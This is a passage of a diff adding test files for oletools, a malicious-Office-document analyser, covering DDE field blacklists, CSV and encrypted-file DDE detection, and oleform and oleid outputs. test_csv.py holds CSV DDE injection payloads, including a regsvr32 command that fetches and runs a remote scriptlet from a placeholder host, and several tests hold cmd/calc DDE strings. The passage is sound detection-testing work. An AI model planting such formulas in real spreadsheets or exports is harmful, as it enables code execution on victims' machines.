+ r'DATE \@ "M/d/yy"',
+ r'DATE \@ "yyyy-MM-dd"',
+ r'DATE \@ "d-MMM-yy"',
+ r'DATE \@ "M.d.yyyy"',
+ r'DATE \@ "MMM. d, yy"',
+ r'DATE \@ "d MMMM yyyy"',
+ r'DATE \@ "MMMM yy"',
+ r'DATE \@ "MMM-yy"',
+ r'DATE \@ "M/d/yyyy h:mm am/pm"',
+ r'DATE \@ "M/d/yyyy h:mm:ss am/pm"',
+ r'DATE \@ "h:mm am/pm"',
+ r'DATE \@ "h:mm:ss am/pm"',
+ r'DATE \@ "HH:mm"',
+ r'DATE \@ "\'Today is \'HH:mm:ss"',
+ r'USERNAME "mary smith" \* Caps',
+ r'USERNAME "mary smith" \* FirstCap',
+ r'USERNAME "Mary Smith" \* Lower',
+ r'USERNAME "Mary Smith" \* Upper',
+ r'DATE \* CHARFORMAT',
+ r'TIME \@ "HH:mm:ss" \* MERGEFORMAT',
+ r'ADVANCE \u 6',
+ r'ADVANCE \d 12',
+ r'ADVANCE \l 20',
+ r'ADVANCE \x 150',
+ r'AUTHOR',
+ r'AUTHOR "Tony Caruso"',
+ r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"
+ r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
+ r'COMMENTS',
+ r'COMMENTS "I came, I saw, I was not impressed."',
+ r'CREATEDATE',
+ r'CREATEDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'CREATEDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss" \h',
+ r'CREATEDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss" \s',
+ r'DATE',
+ r'DATE \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'DATE \@ "dddd, MMMM dd, yyyy HH:mm:ss" \h',
+ r'DATE \@ "dddd, MMMM dd, yyyy HH:mm:ss" \s',
+ r'EDITTIME',
+ r'EDITTIME \* OrdText',
+ r'FILENAME \* Upper',
+ r'FILENAME \p',
+ r'FILESIZE \# #,##0',
+ r'FILESIZE \k',
+ r'FILESIZE \m',
+ r'FORMCHECKBOX',
+ r'FORMDROPDOWN',
+ r'FORMTEXT',
+ r'INDEX \c "1" \e "tab" \g " to " \h "A" \z "1033"',
+ r'KEYWORDS',
+ r'KEYWORDS "field, formatting, switch, syntax"',
+ r'LASTSAVEDBY \* Upper',
+ r'LISTNUM NumberDefault \l 3 \s 1',
+ r'LISTNUM',
+ r'LISTNUM NumberDefault',
+ r'LISTNUM NumberDefault \s 3',
+ r'LISTNUM NumberDefault \l 1',
+ r'LISTNUM NumberDefault \l 1 \s 1',
+ r'LISTNUM LegalDefault \l 1 \s 1', # note: original example uses '\1'
+ r'NOTEREF F10',
+ r'NUMCHARS',
+ r'NUMCHARS \# #,##0',
+ r'NUMPAGES \# #,##0',
+ r'NUMPAGES \* OrdText',
+ r'NUMWORDS',
+ r'NUMWORDS \# #,##0',
+ r'PAGE',
+ r'PAGE \* ArabicDash',
+ r'PAGE \* ALPHABETIC',
+ r'PAGE \* roman',
+ r'PAGEREF Worldpop1990 \p',
+ r'PRINTDATE',
+ r'PRINTDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'REVNUM',
+ r'SAVEDATE',
+ r'SAVEDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'SECTION',
+ r'SECTION \* ArabicDash',
+ r'SECTION \* ALPHABETIC',
+ r'SECTION \* roman',
+ r'SECTIONPAGES',
+ r'SECTIONPAGES \* ArabicDash',
+ r'SECTIONPAGES \* ALPHABETIC',
+ r'SECTIONPAGES \* roman',
+ r'SEQ Figure',
+ r'SEQ Figure \* roman',
+ r'SEQ Figure \n',
+ r'SEQ Figure \c',
+ r'SEQ Figure \h',
+ r'SEQ Figure',
+ r'SEQ Figure \r 1',
+ r'SEQ Figure',
+ r'STYLEREF "Heading 3"',
+ r'STYLEREF "Last Name"',
+ r'STYLEREF "Last Name" \l',
+ r'SUBJECT',
+ r'SUBJECT "A specification for WordprocessingML Fields"',
+ r'SYMBOL 65',
+ r'SYMBOL 66 \a',
+ r'SYMBOL 67 \u',
+ r'SYMBOL 0x20ac \u',
+ r'SYMBOL 68',
+ r'SYMBOL 68 \f Symbol',
+ r'SYMBOL 40 \f Wingdings \s 24',
+ r'TA \l "Hotels v. Leisure Time" \c 2',
+ r'TA \l "Baldwin v. Alberti, 58 Wn. 2d 243 (1961)" \s "Baldwin v. Alberti"'
+ r'\c 1 \b',
+ r'INDEX \e "tab" \c "1" \z "1033"',
+ r'TEMPLATE \* Upper',
+ r'TEMPLATE \p',
+ r'TIME',
+ r'TIME \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'TITLE "My Life, the Fantasy" \* Upper',
+ r'TITLE',
+ r'TOC \o "3-3" \h \z \t "Heading 1,1,Heading 2,2,Appendix 1,1,'
+ r'Appendix 2,2,Unnumbered Heading,1"',
+ r'USERADDRESS',
+ r'USERADDRESS "10 Top Secret Lane, Chiswick" \* Upper',
+ r'USERINITIALS \* Lower',
+ r'USERINITIALS "JaJ"',
+ r'USERINITIALS "jaj" \* Upper',
+ r'XE "Office Open XML" \b',
+ r'XE "syntax" \f "Introduction"',
+ r'XE "behavior:implementation-defined" \b',
+ r'XE "Office Open XML" \i',
+ r'XE "behavior:implementation-defined:documenting" \b',
+ r'XE "grammar" \f "Introduction" \b',
+ r'XE "Office Open XML"',
+ r'XE "item: package-relationship" \t "See package-relationship item"',
+ r'XE "XML" \r OOXMLPageRange',
+ r'XE "grammar" \f "Introduction"',
+ r'XE "production" \f "Introduction"'
+ )
+
+# examples that should not (yet) match the blacklist, either because they
+# should be treated as suspicious or because our parser does not cover them
+EXAMPLES_NOMATCH = (
+ r'INCLUDETEXT "E:\\ReadMe.txt"',
+ r'IF DATE \@ "M-d"<>"1-1" "not " new year\'s day.',
+ r'=X + Y',
+ r'=Result * 10',
+ r'=((-1 + X^2) * 3 - Y)/2',
+ r'=COUNT(BELOW)',
+ r'=SUM(LEFT)',
+ r'=AVERAGE(ABOVE)',
+ r'=4+5 \# 00.00',
+ r'=9+6 \# $###',
+ r'=111053+111439 \# x##',
+ r'=1/8 \# 0.00x',
+ r'=3/4 \# .x',
+ r'=95.4 \# $###.00',
+ r'=2456800 \# $#,###,###',
+ r'=80-90 \# -##',
+ r'=90-80 \# -##',
+ r'=90-80 \# +##',
+ r'=33 \# ##%',
+ r'=Price*15% \# "##0.00 \'is the sales tax\'"',
+ r'=SUM(A1:D4) \# "##0.00 \'is the total of Table\' `table`"',
+ r'=Sales95 \# $#,##0.00;-$#,##0.00',
+ r'=Sales95 \# $#,##0.00;-$#,##0.00;$0',
+ r'1 \* AIUEO',
+ r'=54 \* ALPHABETIC',
+ r'=52 \* alphabetic',
+ r'AUTOTEXT "- PAGE -"',
+ r'AUTOTEXT "Yours truly,"',
+ r'AUTOTEXT Confidential',
+ r'AUTOTEXTLIST "List of salutations" \s Salutation '
+ r'\t "Choose a salutation"',
+ r'ADDRESSBLOCK \f "<<_TITLE0_ >><<_FIRST0_>><< _LAST0_>><< _SUFFIX0_>>\n'
+ r'<<_COMPANY_>>\n<<_STREET1_>>\n'
+ r'<<_STREET2_>>\n'
+ r'<<_CITY_>><<, _STATE_>><< _POSTAL_>><<_COUNTRY_>>"',
+ r'ASK AskResponse "What is your first name?"',
+ r'REF AskResponse',
+ r'{ IF { = OR ( { COMPARE { MERGEFIELD CustomerNumber } >= 4 },',
+ r'{ COMPARE { MERGEFIELD CustomerRating } <= 9 } ) } = 1 '
+ r'"Credit not acceptable" "Credit acceptable"}',
+ r'{ COMPARE "{ MERGEFIELD PostalCode }" = "985*" }',
+ r'{ DATABASE \d "C:\\Data\\Sales93.mdb" \c "DSN=MS Access Database;',
+ r'DBQ=C:\\Data\\Sales93.mdb; FIL=RedISAM" '
+ r'\s "select * from \"Customer List\"" \f "2445" \t "2486" \l "2"',
+ r' FILLIN "Please enter the appointment time for '
+ r'MERGEFIELD PatientName :"',
+ r'GOTOBUTTON MyBookmark Dest',
+ r'GOTOBUTTON p3 Page',
+ r'GOTOBUTTON "f 2" Footnote',
+ r'HYPERLINK http://www.example.com/',
+ r'HYPERLINK "E:\\ReadMe.txt"',
+ r'{IF order >= 100 "Thanks" "The minimum order is 100 units" }',
+ r'INCLUDEPICTURE "file:///g:/photos/Ellen%20in%20Oslo.jpg"',
+ r'INCLUDETEXT "file:///C:/Winword/Port Development RFP" Summary',
+ r'INCLUDETEXT "file:///C:/Resume.xml" \n xmlns:a=\"resume-schema\" '
+ r'\t "file:///C:/display.xsl" \x a:Resume/a:Name',
+ r'{ LINK Excel.Sheet.8 "C:\\My Documents\\Profits.xls"',
+ r'"Sheet1!R1C1:R4C4" \a \p }',
+ r'MERGEFIELD CoutesyTitle \f " "',
+ r'MERGEFIELD FirstName \f " "',
+ r'MERGEFIELD LastName',
+ r'= { PRINTDATE \@ "MMddyyyyHHmm" + MERGEREC }',
+ r'MERGEFIELD Name MERGEFIELD Phone',
+ r'NEXT MERGEFIELD Name MERGEFIELD Phone',
+ r'NEXT MERGEFIELD Name MERGEFIELD Phone',
+ r' QUOTE IF DATE \@ "M" = 1 "12" "= DATE \@ "M" - 1"/1/2000 \@',
+ r'"MMMM"',
+ r'RD C:\\Manual\\Chapters\\Chapter1.doc',
+ r'REF _Ref116788778 \r \h',
+ r'SET EnteredBy "Paul Smith"',
+ r'SET UnitCost 25.00',
+ r'SET Quantity FILLIN "Enter number of items ordered:"',
+ r'SET SalesTax 10%',
+ r'SET TotalCost = (UnitCost * Quantity) + ((UnitCost * Quantity) * '
+ r'SalesTax)',
+ r'SKIPIF MERGEFIELD Order < 100',
+ )
+
+
+class TestBlacklist(unittest.TestCase):
+ """ Tests msodde blacklist feature """
+
+ def test_matches(self):
+ """ check a long list of examples that should match the blacklist """
+ for example in EXAMPLES_MATCH:
+ self.assertTrue(field_is_blacklisted(example),
+ msg="Failed to match: '{0}'".format(example))
+
+ def test_nomatches(self):
+ """ check a long list of examples that should match the blacklist """
+ for example in EXAMPLES_NOMATCH:
+ self.assertFalse(field_is_blacklisted(example),
+ msg="Accidentally matched: '{0}'".format(example))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/msodde/test_crypto.py b/tests/msodde/test_crypto.py
new file mode 100644
index 00000000..38b2f06b
--- /dev/null
+++ b/tests/msodde/test_crypto.py
@@ -0,0 +1,32 @@
+"""Check decryption of files from msodde works."""
+
+import sys
+import unittest
+from os.path import basename, join as pjoin
+
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+
+from oletools import crypto
+
+
+@unittest.skipIf(not crypto.check_msoffcrypto(),
+ 'Module msoffcrypto not installed for {}'
+ .format(basename(sys.executable)))
+class MsoddeCryptoTest(unittest.TestCase):
+ """Test integration of decryption in msodde."""
+
+ def test_standard_password(self):
+ """Check dde-link is found in xls[mb] sample files."""
+ for suffix in 'xls', 'xlsx', 'xlsm', 'xlsb':
+ example_file = pjoin(DATA_BASE_DIR, 'encrypted',
+ 'dde-test-encrypt-standardpassword.' + suffix)
+ output, _ = call_and_capture('msodde', [example_file, ])
+ self.assertIn('\nDDE Links:\ncmd /c calc.exe\n', output,
+ msg='Unexpected output {!r} for {}'
+ .format(output, suffix))
+
+ # TODO: add more, in particular a sample with a "proper" password
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/msodde/test_csv.py b/tests/msodde/test_csv.py
new file mode 100644
index 00000000..92131b41
--- /dev/null
+++ b/tests/msodde/test_csv.py
@@ -0,0 +1,129 @@
+#!/usr/bin/env python3
+
+
+""" Check various csv examples """
+
+import unittest
+from tempfile import mkstemp
+import os
+from os.path import join
+
+from oletools import msodde
+from tests.test_utils import DATA_BASE_DIR
+
+
+class TestCSV(unittest.TestCase):
+ """ Check various csv examples """
+
+ DO_DEBUG = False
+
+ def test_texts(self):
+ """ write some sample texts to file, run those """
+ SAMPLES = (
+ "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''",
+ "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " +
+ "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''",
+ "completely innocent text"
+ )
+
+ LONG_SAMPLE_FACTOR = 100 # make len(sample) > CSV_SMALL_THRESH
+ DELIMITERS = ',\t ;|^'
+ QUOTES = '', '"' # no ' since samples use those "internally"
+ PREFIXES = ('', '{quote}item-before{quote}{delim}',
+ '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR,
+ '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR +
+ '{quote}item-before{quote}{delim}')
+ SUFFIXES = ('', '{delim}{quote}item-after{quote}',
+ '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR,
+ '{delim}{quote}item-after{quote}' +
+ '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR)
+
+ for sample_core in SAMPLES:
+ for prefix in PREFIXES:
+ for suffix in SUFFIXES:
+ for delim in DELIMITERS:
+ for quote in QUOTES:
+ # without quoting, the command is split at space or |
+ if quote == '' and delim in sample_core:
+ continue
+
+ sample = \
+ prefix.format(quote=quote, delim=delim) + \
+ quote + sample_core + quote + delim + \
+ suffix.format(quote=quote, delim=delim)
+ output = self.write_and_run(sample)
+ n_links = len(self.get_dde_from_output(output))
+ desc = 'sample with core={0!r}, prefix-len {1}, ' \
+ 'suffix-len {2}, delim {3!r} and quote ' \
+ '{4!r}'.format(sample_core, len(prefix),
+ len(suffix), delim, quote)
+ if 'innocent' in sample:
+ self.assertEqual(n_links, 0, 'found dde-link '
+ 'in clean sample')
+ else:
+ msg = 'Failed to find dde-link in ' + desc
+ self.assertEqual(n_links, 1, msg)
+ if self.DO_DEBUG:
+ print('Worked: ' + desc)
+
+ def test_file(self):
+ """ test simple small example file """
+ filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv')
+ output = msodde.process_file(filename, msodde.FIELD_FILTER_BLACKLIST)
+ links = self.get_dde_from_output(output)
+ self.assertEqual(len(links), 1)
+ self.assertEqual(links[0],
+ r"cmd '/k \..\..\..\Windows\System32\calc.exe'")
+
+ def write_and_run(self, sample_text):
+ """ helper for test_texts: save text to file, run through msodde """
+ filename = None
+ handle = 0
+ try:
+ handle, filename = mkstemp(prefix='oletools-test-csv-', text=True)
+ os.write(handle, sample_text.encode('ascii'))
+ os.close(handle)
+ handle = 0
+ args = [filename, ]
+ if self.DO_DEBUG:
+ args += ['-l', 'debug']
+
+ processed_args = msodde.process_args(args)
+
+ return msodde.process_file(
+ processed_args.filepath, processed_args.field_filter_mode)
+
+ finally:
+ if handle:
+ os.close(handle)
+ handle = 0 # just in case
+ if filename:
+ if self.DO_DEBUG:
+ print('keeping for debug purposes: {0}'.format(filename))
+ else:
+ os.remove(filename)
+ filename = None # just in case
+
+ @staticmethod
+ def get_dde_from_output(output):
+ """ helper to read dde links from captured output
+ """
+ return output.splitlines()
+
+ def test_regex(self):
+ """ check that regex captures other ways to include dde commands
+
+ from http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/ and/or
+ https://www.contextis.com/blog/comma-separated-vulnerabilities
+ """
+ kernel = "cmd|'/c calc'!A0"
+ for wrap in '={0}', '@SUM({0})', '"={0}"', '+{0}', '-{0}':
+ cmd = wrap.format(kernel)
+ self.assertNotEqual(msodde.CSV_DDE_FORMAT.match(cmd), None)
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/msodde_doc/test_basic.py b/tests/msodde_doc/test_basic.py
deleted file mode 100644
index 0d366b1a..00000000
--- a/tests/msodde_doc/test_basic.py
+++ /dev/null
@@ -1,119 +0,0 @@
-""" Test some basic behaviour of msodde.py
-
-Ensure that
-- doc and docx are read without error
-- garbage returns error return status
-- dde-links are found where appropriate
-"""
-
-from __future__ import print_function
-
-import unittest
-from oletools import msodde
-import shlex
-from os.path import join, dirname, normpath
-import sys
-
-# python 2/3 version conflict:
-if sys.version_info.major <= 2:
- from StringIO import StringIO
- #from io import BytesIO as StringIO - try if print() gives UnicodeError
-else:
- from io import StringIO
-
-
-# base directory for test input
-BASE_DIR = normpath(join(dirname(__file__), '..', 'test-data'))
-
-
-class TestReturnCode(unittest.TestCase):
-
- def test_valid_doc(self):
- """ check that a valid doc file leads to 0 exit status """
- print(join(BASE_DIR, 'msodde-doc/test_document.doc'))
- self.do_test_validity(join(BASE_DIR, 'msodde-doc/test_document.doc'))
-
- def test_valid_docx(self):
- """ check that a valid docx file leads to 0 exit status """
- self.do_test_validity(join(BASE_DIR, 'msodde-doc/test_document.docx'))
-
- def test_invalid_none(self):
- """ check that no file argument leads to non-zero exit status """
- self.do_test_validity('', True)
-
- def test_invalid_empty(self):
- """ check that empty file argument leads to non-zero exit status """
- self.do_test_validity(join(BASE_DIR, 'basic/empty'), True)
-
- def test_invalid_text(self):
- """ check that text file argument leads to non-zero exit status """
- self.do_test_validity(join(BASE_DIR, 'basic/text'), True)
-
- def do_test_validity(self, args, expect_error=False):
- """ helper for test_valid_doc[x] """
- args = shlex.split(args)
- return_code = -1
- have_exception = False
- try:
- return_code = msodde.main(args)
- except Exception:
- have_exception = True
- except SystemExit as se: # sys.exit() was called
- return_code = se.code
- if se.code is None:
- return_code = 0
-
- self.assertEqual(expect_error, have_exception or (return_code != 0))
-
-
-class OutputCapture:
- """ context manager that captures stdout """
-
- def __init__(self):
- self.output = StringIO() # in py2, this actually is BytesIO
-
- def __enter__(self):
- sys.stdout = self.output
- return self
-
- def __exit__(self, exc_type, exc_value, traceback):
- sys.stdout = sys.__stdout__ # re-set to original
-
- if exc_type: # there has been an error
- print('Got error during output capture!')
- print('Print captured output and re-raise:')
- for line in self.output.getvalue().splitlines():
- print(line.rstrip()) # print output before re-raising
-
- def __iter__(self):
- for line in self.output.getvalue().splitlines():
- yield line.rstrip() # remove newline at end of line
-
-
-class TestDdeInDoc(unittest.TestCase):
-
- def test_with_dde(self):
- """ check that dde links appear on stdout """
- with OutputCapture() as capturer:
- msodde.main([join(BASE_DIR, 'msodde-doc', 'dde-test.doc')])
-
- for line in capturer:
- print(line)
- pass # we just want to get the last line
-
- self.assertNotEqual(len(line.strip()), 0)
-
- def test_no_dde(self):
- """ check that no dde links appear on stdout """
- with OutputCapture() as capturer:
- msodde.main([join(BASE_DIR, 'msodde-doc', 'test_document.doc')])
-
- for line in capturer:
- print(line)
- pass # we just want to get the last line
-
- self.assertEqual(line.strip(), '')
-
-
-if __name__ == '__main__':
- unittest.main()
diff --git a/tests/oleform/__init__.py b/tests/oleform/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/oleform/test_basic.py b/tests/oleform/test_basic.py
new file mode 100644
index 00000000..0534c59b
--- /dev/null
+++ b/tests/oleform/test_basic.py
@@ -0,0 +1,262 @@
+""" Test oleform basic functionality """
+
+import unittest
+from os.path import join
+import sys
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR
+
+from oletools.olevba import VBA_Parser
+
+# TODO: these results are slightly wrong due to a bug in the oleform parser;
+# accept them as expected values until oleform is fixed (see issue #568)
+SAMPLES = [('oleform-PR314.docm',
+ [('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 21,
+ 'caption': 'Label1-test',
+ 'control_tip_text': None,
+ 'id': 1,
+ 'name': 'Label1',
+ 'tabindex': 0,
+ 'tag': 'l\x18sdf',
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 23,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 2,
+ 'name': 'TextBox1',
+ 'tabindex': 1,
+ 'tag': None,
+ 'value': 'heyhey'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 25,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 3,
+ 'name': 'ComboBox1',
+ 'tabindex': 2,
+ 'tag': None,
+ 'value': 'none dd'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 26,
+ 'caption': '\xba\xa5\x18mouah',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 5,
+ 'name': 'CheckBox1',
+ 'tabindex': 4,
+ 'tag': None,
+ 'value': '1'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 27,
+ 'caption': '\xba\xa5\x18OptionButt',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 6,
+ 'name': 'OptionButton1',
+ 'tabindex': 5,
+ 'tag': None,
+ 'value': '0'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 28,
+ 'caption': '\xba\xa5\x18ToggleButt',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 7,
+ 'name': 'ToggleButton1',
+ 'tabindex': 6,
+ 'tag': None,
+ 'value': '0'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 14,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 8,
+ 'name': 'Frame1',
+ 'tabindex': 7,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 18,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 10,
+ 'name': 'TabStrip1',
+ 'tabindex': 8,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 17,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 9,
+ 'name': 'CommandButton1',
+ 'tabindex': 9,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 57,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 12,
+ 'name': 'MultiPage1',
+ 'tabindex': 10,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 47,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 16,
+ 'name': 'ScrollBar1',
+ 'tabindex': 11,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 16,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 17,
+ 'name': 'SpinButton1',
+ 'tabindex': 12,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 12,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 18,
+ 'name': 'Image1',
+ 'tabindex': 13,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1',
+ {'ClsidCacheIndex': 24,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 4,
+ 'name': 'ListBox1',
+ 'tabindex': 3,
+ 'tag': None,
+ 'value': ''}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i08',
+ {'ClsidCacheIndex': 23,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 20,
+ 'name': 'TextBox2',
+ 'tabindex': 0,
+ 'tag': None,
+ 'value': 'abcd'}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i12',
+ {'ClsidCacheIndex': 18,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 13,
+ 'name': None,
+ 'tabindex': 2,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i12',
+ {'ClsidCacheIndex': 7,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 14,
+ 'name': 'Page1',
+ 'tabindex': 0,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i12',
+ {'ClsidCacheIndex': 7,
+ 'caption': None,
+ 'control_tip_text': None,
+ 'id': 15,
+ 'name': 'Page2',
+ 'tabindex': 1,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTEST1/i12/i14',
+ {'ClsidCacheIndex': 23,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 24,
+ 'name': 'TextBox3',
+ 'tabindex': 0,
+ 'tag': None,
+ 'value': 'last one'}),
+ ('word/vbaProject.bin',
+ u'UserFormTest2',
+ {'ClsidCacheIndex': 21,
+ 'caption': 'Label1',
+ 'control_tip_text': None,
+ 'id': 1,
+ 'name': 'Label1',
+ 'tabindex': 0,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTest2',
+ {'ClsidCacheIndex': 21,
+ 'caption': 'Label2',
+ 'control_tip_text': None,
+ 'id': 2,
+ 'name': 'Label2',
+ 'tabindex': 1,
+ 'tag': None,
+ 'value': None}),
+ ('word/vbaProject.bin',
+ u'UserFormTest2',
+ {'ClsidCacheIndex': 23,
+ 'caption': '',
+ 'control_tip_text': None,
+ 'group_name': '',
+ 'id': 3,
+ 'name': 'TextBox1',
+ 'tabindex': 2,
+ 'tag': None,
+ 'value': '&\xe9"\''})]
+ )]
+
+class TestOleForm(unittest.TestCase):
+
+ def test_samples(self):
+ if sys.version_info[0] > 2:
+ # olevba3 does not implement extract_form_strings_extended
+ self.skipTest('extract_form_strings_extended is not '
+ 'available with olevba3 on Python 3')
+ for sample, expected_result in SAMPLES:
+ full_name = join(DATA_BASE_DIR, 'oleform', sample)
+ parser = VBA_Parser(full_name)
+ variables = list(parser.extract_form_strings_extended())
+ self.assertEqual(variables, expected_result)
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
+
diff --git a/tests/oleid/__init__.py b/tests/oleid/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/oleid/test_basic.py b/tests/oleid/test_basic.py
new file mode 100644
index 00000000..ce4187aa
--- /dev/null
+++ b/tests/oleid/test_basic.py
@@ -0,0 +1,183 @@
+"""
+Test basic functionality of oleid
+
+Should work with python2 and python3!
+"""
+
+import unittest
+import os
+from os.path import join, relpath, splitext
+from oletools import oleid
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR
+
+
+class TestOleIDBasic(unittest.TestCase):
+ """Test basic functionality of OleID"""
+
+ def test_all(self):
+ """Run all file in test-data through oleid and compare to known ouput"""
+ # this relies on order of indicators being constant, could relax that
+ # Also requires that files have the correct suffixes (no rtf in doc)
+ NON_OLE_SUFFIXES = ('.xml', '.csv', '.rtf', '', '.odt', '.ods', '.odp')
+ NON_OLE_VALUES = (False, )
+ WORD = b'Microsoft Office Word'
+ PPT = b'Microsoft Office PowerPoint'
+ EXCEL = b'Microsoft Excel'
+ CRYPT = (True, False, 'unknown', True, False, False, False, False,
+ False, False, 0)
+ OLE_VALUES = {
+ 'oleobj/sample_with_lnk_file.doc': (True, True, WORD, False, True,
+ False, False, False, False,
+ True, 0),
+ 'oleobj/embedded-simple-2007.xlsb': (False,),
+ 'oleobj/embedded-simple-2007.docm': (False,),
+ 'oleobj/embedded-simple-2007.xltx': (False,),
+ 'oleobj/embedded-simple-2007.xlam': (False,),
+ 'oleobj/embedded-simple-2007.dotm': (False,),
+ 'oleobj/sample_with_lnk_file.ppt': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/embedded-simple-2007.xlsx': (False,),
+ 'oleobj/embedded-simple-2007.xlsm': (False,),
+ 'oleobj/embedded-simple-2007.ppsx': (False,),
+ 'oleobj/embedded-simple-2007.pps': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/embedded-simple-2007.xla': (True, True, EXCEL, False,
+ False, False, True, False,
+ False, False, 0),
+ 'oleobj/sample_with_calc_embedded.doc': (True, True, WORD, False,
+ True, False, False, False,
+ False, True, 0),
+ 'oleobj/embedded-unicode-2007.docx': (False,),
+ 'oleobj/embedded-unicode.doc': (True, True, WORD, False, True,
+ False, False, False, False, True,
+ 0),
+ 'oleobj/embedded-simple-2007.doc': (True, True, WORD, False, True,
+ False, False, False, False,
+ True, 0),
+ 'oleobj/embedded-simple-2007.xls': (True, True, EXCEL, False,
+ False, False, True, False,
+ False, False, 0),
+ 'oleobj/embedded-simple-2007.dot': (True, True, WORD, False, True,
+ False, False, False, False,
+ True, 0),
+ 'oleobj/sample_with_lnk_to_calc.doc': (True, True, WORD, False,
+ True, False, False, False,
+ False, True, 0),
+ 'oleobj/embedded-simple-2007.ppt': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/sample_with_lnk_file.pps': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/embedded-simple-2007.pptx': (False,),
+ 'oleobj/embedded-simple-2007.ppsm': (False,),
+ 'oleobj/embedded-simple-2007.dotx': (False,),
+ 'oleobj/embedded-simple-2007.pptm': (False,),
+ 'oleobj/embedded-simple-2007.xlt': (True, True, EXCEL, False,
+ False, False, True, False,
+ False, False, 0),
+ 'oleobj/embedded-simple-2007.docx': (False,),
+ 'oleobj/embedded-simple-2007.potx': (False,),
+ 'oleobj/embedded-simple-2007.pot': (True, True, PPT, False, False,
+ False, False, True, False,
+ False, 0),
+ 'oleobj/embedded-simple-2007.xltm': (False,),
+ 'oleobj/embedded-simple-2007.potm': (False,),
+ 'encrypted/encrypted.xlsx': CRYPT,
+ 'encrypted/encrypted.docm': CRYPT,
+ 'encrypted/encrypted.docx': CRYPT,
